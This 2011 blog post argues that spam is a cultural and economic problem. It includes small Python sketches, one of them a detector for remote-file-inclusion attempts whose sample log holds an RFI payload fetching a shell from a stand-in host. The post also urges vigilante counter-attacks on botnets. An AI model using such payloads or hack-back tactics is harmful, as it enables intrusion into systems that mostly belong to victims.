Even One Word

The Blog of Nathan St. Pierre


The New Culture of Spam

Thursday, February 3, 2011

I realize I'm not the first one to talk about this (see Cory Doctorow's thoughts on the subject), but the nature of the internet and of spam has changed over the years.

It used to be that you protected your e-mail address as though it were the most secret information in the universe, next to the last four digits of your Social Security number and your weight (and/or age, depending on your gender and personality). But just like the last four digits of your Social Security number, your weight, your age, and probably even roughly how much money you make, your info is all over the freaking place. And this isn't just the case with e-mail; it's the case with blogs, forums, and any form of communication that would ever require a Turing test. As of right now, I have about 200 comments on my blog, and only 4 of them are legitimate. So how have people fought this?

  1. Obfuscate your e-mail address like name (at) domain (dot) com.
  2. Turn off comments on your blog.
  3. Employ a site admin, moderator, or other full/part-time culler of the wheat from the chaff (or the spam from the real meat, whichever analogy fits your dietary restrictions best).
  4. Use the aforementioned Turing test anywhere that allows human input.
  5. Automation.
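Item 1 is easy to sketch, and undoing it takes about as much code as doing it. A minimal Python illustration follows; `obfuscate_email` and `deobfuscate_email` are hypothetical helpers (not from any library), and the round trip assumes a well-formed address with exactly one `@`.

```python
import re


def obfuscate_email(address: str) -> str:
    """Turn name@domain.com into 'name (at) domain (dot) com'.

    Assumes a well-formed address with exactly one '@'.
    """
    local, _, domain = address.partition("@")
    # Spell out every dot in the domain, so sub.domain.co.uk works too.
    return f"{local} (at) {domain.replace('.', ' (dot) ')}"


def deobfuscate_email(text: str) -> str:
    """Undo the trick, the way a slightly-less-lazy scraper could."""
    text = re.sub(r"\s*\(at\)\s*", "@", text)
    return re.sub(r"\s*\(dot\)\s*", ".", text)


hidden = obfuscate_email("nathan@nathanstpierre.com")
print(hidden)                     # nathan (at) nathanstpierre (dot) com
print(deobfuscate_email(hidden))  # nathan@nathanstpierre.com
```

Two regular expressions are all a scraper needs to reverse it.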
The problem with every one of these is that they all treat the symptoms of an underlying disease. As for which of these symptom treatments works best? The shortest and last one, of course! Of the 200 comments on my blog, around 190 are marked as spam, filtered by a plug-in most WordPress users know as Akismet. My public e-mail (nathan@nathanstpierre.com, btw) is in no way obfuscated or filtered by me, because it goes through Gmail, which has (as far as I've seen) the most intricate spam filtering of any public mail service. As Mr. Doctorow so intelligently pointed out, these systems exist for exactly this reason, so why not use them?

That being said, I still think the underlying disease goes untreated. Unfortunately, it's the same disease that ruined the old-school forums, social media (MySpace whores, anyone?), and even legitimate community tools (try buying something on Craigslist from someone who isn't a Nigerian scammer. I dare you.). It is both the chief weakness and the chief strength of the Internet: freedom. The catch with an open and endless system is that you ultimately end up at the mercy of the demographic that uses it.

Great examples of this philosophy's successes include open source (none of us is as smart as all of us) and Wikipedia (the nice people who care will ultimately win out over the jerks, because they aren't doing the easy thing; they're doing the thing they care about). The failures of this freedom are pretty much the inverse: false information reported on national TV thanks to the Bogus Blogosphere, entire systems overrun by spammers (Google Groups, anyone?), and so forth. So is there a cure?

In the spirit of presenting a solution rather than a problem, I suggest a change. Not a change in software or business models; a change in philosophy. We once thought the internet was too massive and too free to infringe upon, but YouTube shattered that preconception for me when they freaking scanned videos for copyrighted material. Could software ultimately determine what's spam and what's legit, become part of every ISP's basic network protocol, and insta-delete anything that clutters their domains with horrendous spam? Potentially. But should it?

Honestly, that kind of Big Brother dystopia (which would likely make my favorite cyberpunk plots possible) strikes me as the more mechanical answer. It completely ignores the spirit of the issue, which is cultural: the culture of the internet has become beneficial to spam.

"But this is a blog about web development!" you say. "How does being a hippie and talking about working toward a new society help anything?"

Well, algorithms are great, but as Google is finding out, they're not the answer to everything (what we call a silver bullet). For an example of someone gaming Google's algorithm in a seriously negative way, check out the story of DecorMyEyes. To summarize: a shady businessman discovered that Google ranks sites partly on how often people mention them, along with certain search terms. He realized that customers blasting him on a thousand consumer-complaint sites for botching their (insert glasses brand name here) orders would push his site to the top of the results for anyone searching for (insert brand name here) and/or "glasses." Google's response? Essentially, change the algorithm. From their actual response:

... in the last few days we developed an algorithmic solution which detects the merchant from the Times article along with hundreds of other merchants that, in our opinion, provide an extremely poor user experience. The algorithm we incorporated into our search rankings represents an initial solution to this issue, and Google users are now getting a better experience as a result.
Is this a good solution? Honestly, it's probably the best one given the situation. As they explain in the post, simply blocking this one merchant, or using sentiment analysis (separating good reviews from bad ones), could cause the inverse problem: game the system by posting a million bad reviews of Best Buy, and suddenly Best Buy never shows up in Google searches for Best Buy.
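To make the DecorMyEyes problem and its inverse concrete, here is a toy model in Python. It is not Google's algorithm (nobody outside Google knows what that is); it only contrasts two hypothetical scoring rules on made-up data: counting every mention, and weighting mentions by sentiment. The site names and mention counts are invented for illustration.

```python
from collections import Counter

# Toy data, entirely hypothetical: (site, sentiment) pairs, +1 praise, -1 complaint.
mentions = (
    [("honest-optician.example", +1)] * 40
    + [("shady-glasses.example", -1)] * 300
)


def rank_by_mentions(mentions):
    """Naive ranking: every mention counts, whether it's praise or a complaint."""
    counts = Counter(site for site, _ in mentions)
    return [site for site, _ in counts.most_common()]


def rank_by_sentiment(mentions):
    """Sentiment-weighted ranking: complaints subtract instead of add."""
    scores = Counter()
    for site, sentiment in mentions:
        scores[site] += sentiment
    return sorted(scores, key=scores.get, reverse=True)


print(rank_by_mentions(mentions))   # shady site first: complaints pay off
print(rank_by_sentiment(mentions))  # honest site first: looks fixed...

# ...until someone floods the honest site with 1,000 fake complaints.
attacked = mentions + [("honest-optician.example", -1)] * 1000
print(rank_by_sentiment(attacked))  # shady site first again
```

Either rule can be gamed by whoever controls the volume of mentions; the second one just changes which direction the gaming has to go.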

But what has happened recently between Google and Microsoft's Bing makes me think the algorithm isn't the solution; it's the problem. If you haven't heard the latest news, check out the story from Seattle's own KIRO TV. Essentially, Google set up a "honeypot" by planting completely arbitrary results for searches on random strings of characters, and those same results turned up on Bing. Unless Microsoft figured out how to steal one of the most carefully guarded algorithms in the tech industry, I highly doubt this happened as a freak accident. It's pretty clear Microsoft is doing something sketchy. But whether they are or not, suppose someone at some point did. That would prove my point: the world ultimately doesn't care whose algorithm it is. If you can steal it, where's the incentive not to?

So we come back to the issue: the culture of spam. As YouTube discovered (I'm sure through Google's technology), there are ways to figure these things out automatically. As I said before, an algorithmic fix is probably the best of the options we have at the moment, but we honestly need to find a better way to approach this. For that, I go back to what I mentioned earlier: f*cking Wikipedia and open source, how do they work?

They work by having the right balance of resources, both personnel and technology. Enough coders are willing to clone the git repository of a new build and try to break it. That work is hard and challenging, and it scares off spammers, who will try to take the easiest and fastest route through the maze to the cheese. People who are earnestly devoted to a cause will inevitably find a way past people who are lazily gaming the system. Why?

Ask the Russians, who spent the entire Cold War stealing and duplicating Western technology, mastering and decrypting it just in time to be three generations behind their innovating enemies. DirecTV's "Black Sunday" kill is a better example of this in action in the technology world.

So ultimately, what is the exact mechanism by which we can make search engines, blogs, e-mail, and so forth unspammable? I don't know. Not that it's impossible to figure out; I think someone with less skill than I have could easily figure it out given enough incentive (usually motivation like anger, and resources like free time). But the ultimate solution will have to counteract the current disease: spammers are making money.

Every one of those ads for "A bigger Pen15" makes money, because someone who got that e-mail sent money to someone. Every time a Nigerian princess is held for ransom in your inbox, some gallant fellow cashes out his 401(k) to save her. That one man's $5,000 is worth orders of magnitude more than the cost of sending out those spam e-mails, which can range from a few hundred dollars for millions of e-mails to a dollar for thousands (depending on where the servers are and which botnet is used). There are lots of resources that discuss this, but my favorite right now is the HowStuffWorks explanation.
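To put rough numbers on those economics, here is a break-even calculation in Python. The campaign costs and sizes are hypothetical values picked from the two ends of the range quoted above, the $5,000 payout is the single victim from the 401(k) example, and `break_even_audience` is an illustrative helper, not something from any source.

```python
def break_even_audience(campaign_cost, emails_sent, payout_per_victim):
    """Recipients per paying victim at which the campaign exactly pays for itself.

    victims needed   = campaign_cost / payout_per_victim
    break-even rate  = victims needed / emails_sent
    audience per hit = 1 / break-even rate
    """
    return payout_per_victim * emails_sent / campaign_cost


# Hypothetical figures from the ends of the quoted range, same $5,000 victim.
scenarios = {
    "$300 for 3 million e-mails": (300, 3_000_000, 5_000),
    "$1 for 5,000 e-mails": (1, 5_000, 5_000),
}
for label, (cost, sent, payout) in scenarios.items():
    n = break_even_audience(cost, sent, payout)
    print(f"{label}: one $5,000 victim per {n:,.0f} recipients breaks even")
```

Under these made-up figures, the spammer covers costs if one recipient in 25 to 50 million bites; everyone else who ignores the mail costs the spammer almost nothing.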

So the solution seems simple enough, just keep them from making money! But how do we approach this?

Well, we've tried education on a massive scale: from teaching your grandparents not to click on spam to teaching your children about scams through computer literacy. We've tried blocking those parts of the internet to protect people from themselves. We've tried spam blockers, CAPTCHAs, and every automation system possible. But these ALL address the symptoms. Even legislating against spam has turned out to be a pipe dream (and honestly, legislation just makes breaking the law more fun for those who wanted to in the first place). My proposed solution at this moment?

Make them pay.

Legislation proposes fines, but the problem with legislation is that it's only justifiable if we can prove beyond a shadow of a doubt that the suspects are in fact the perpetrators. I say we employ the same annoying-bastard tactics we saw used against the enemies of Julian Assange. Will it be easy? HELL NO.

As we all know, spammers use botnets and hordes of zombies, so tracking down the source of spam e-mails will most likely lead you to victims instead of perpetrators. On top of this, they often launch DDoS attacks or ping storms against people who try to track them down. But these are issues we can address.

When these hackers take over a computer, they typically leave a back door so they can come back and use it for their various purposes. Many even come with a kill switch, so they can revert the server/computer/device and keep others from using their system against them. Most of these systems are freely available, and finding the kill switch is just a matter of knowing which attack was launched against your site.

The operators hide their location and just send an anonymous text, e-mail, or packet of data to the zombie herd... which makes for a perfectly good honeypot. Intentionally leave a site open to RFI (remote file inclusion) attack, for example, and then monitor every packet that comes into the system. When one arrives, you can trace its source. Most likely it'll come from behind a series of hops, firewalls, and other zombies, but at least you know where that packet came from. Repeat this process enough times, and you find the root. At the very least, you can sniff the network and either selectively block it, or keep a database of IP addresses logged with the software that compromised them, so when you find a kill switch, you have somewhere to attack.
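This sketch covers only the bookkeeping half of the honeypot idea above: pulling RFI attempts out of a web server access log and building the "database of IP addresses" as a plain dict. The Common Log Format, the function name `find_rfi_attempts`, and the sample lines (documentation-range IPs and an `example.net` payload URL) are all assumptions for illustration. It doesn't trace hops or touch any kill switch, and, as noted above, the IP it records will most likely be just another zombie.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Assumes Common Log Format lines: IP, ident, user, [time], "METHOD target PROTO", ...
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*"')
# A query value that is itself a remote URL is the classic RFI fingerprint.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def find_rfi_attempts(lines):
    """Map each source IP to the set of remote URLs it tried to get included."""
    attempts = defaultdict(set)
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue  # skip lines that aren't in the expected format
        query = urlsplit(match.group("target")).query
        for _name, value in parse_qsl(query):  # parse_qsl also URL-decodes
            if REMOTE_URL.match(value):
                attempts[match.group("ip")].add(value)
    return dict(attempts)


sample_log = [
    '203.0.113.7 - - [03/Feb/2011:10:15:32 -0800] '
    '"GET /index.php?page=http://bad.example.net/shell.txt HTTP/1.1" 200 512',
    '198.51.100.23 - - [03/Feb/2011:10:16:01 -0800] '
    '"GET /index.php?page=about HTTP/1.1" 200 2048',
]
print(find_rfi_attempts(sample_log))
# {'203.0.113.7': {'http://bad.example.net/shell.txt'}}
```

Keeping the payload URL next to each IP is what lets you later group compromised machines by the kit that was used against them.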

Granted, these are all ideas off the top of my head, and I'm only one man. But none of us is as smart as all of us, so let's do this. Let's get pissed, let's get serious, and let's change the culture of spam. Honestly, I think it's about time the white hats did something other than turn up their noses at software piracy. And I'm ready to help.